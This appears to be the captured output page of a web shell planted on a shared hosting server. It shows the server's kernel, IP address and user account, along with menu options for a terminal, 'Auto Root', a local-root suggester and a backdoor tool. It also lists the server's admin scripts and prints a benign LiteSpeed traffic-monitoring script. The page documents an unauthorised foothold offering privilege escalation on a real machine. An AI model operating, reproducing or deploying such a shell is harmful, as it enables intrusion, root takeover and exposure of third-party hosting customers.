Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.1
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
sp_scripts /
Delete
Unzip
Name
Size
Permission
Date
Action
accounts_audit.sh
1.05
KB
-rwxr-xr-x
2026-02-24 11:05
fix_cagefs
474
B
-rwxr-xr-x
2026-02-24 11:05
jb5_to_cpanel_convertor.sh
13.78
KB
-rwxr-xr-x
2026-02-24 11:05
log_flood_block.sh
5.18
KB
-rwxr-xr-x
2026-02-24 11:05
lstop.py
1.19
KB
-rwxr-xr-x
2026-02-24 11:05
phpmoves.sh
1.59
KB
-rwxr-xr-x
2026-02-24 11:05
post_transfer_cleanup.sh
3.28
KB
-rwxr-xr-x
2026-02-24 11:05
reseller_csf_priv.php
282
B
-rwxr-xr-x
2026-02-24 11:05
sp_remote_sql.php
2.73
KB
-rwxr-xr-x
2026-02-24 11:05
uap.py
3.83
KB
-rwxr-xr-x
2026-02-24 11:05
wellknown.sh
2.48
KB
-rwxr-xr-x
2026-02-24 11:05
Save
Rename
#!/usr/bin/env python3 # lsTop: LiteSpeed script to display top domains by requests/s. # Tsvetan Gerov <tsvetan@worldhost.group> # v0.1 import re import glob domain_info = {} directory = '/tmp/lshttpd/' file_pattern = '.rtreport*' files = glob.glob(directory + file_pattern) for filename in files: with open(filename, 'r') as file: content = file.read() matches = re.findall(r'REQ_RATE \[APVH_(.*?)\]: .* REQ_PER_SEC: ([0-9.]+)', content) for domain, requests_per_sec in matches: modified_domain = domain.split(':')[0] modified_domain = modified_domain.replace("APVH_", "") if modified_domain in domain_info: domain_info[modified_domain] += int(float(requests_per_sec)) else: domain_info[modified_domain] = int(float(requests_per_sec)) sorted_domains = sorted(domain_info.items(), key=lambda x: x[1]) print("| {:<70s} | {:<8s} |".format("Domain", "Req/s")) print("|" + "-" * 72 + "|" + "-" * 10 + "|") for domain, requests_per_sec in sorted_domains: print(f"| {domain:<70} | {requests_per_sec:8d} |") print("|" + "-" * 72 + "|" + "-" * 10 + "|") print("| {:<70s} | {:<8s} |".format("Domain", "Req/s"))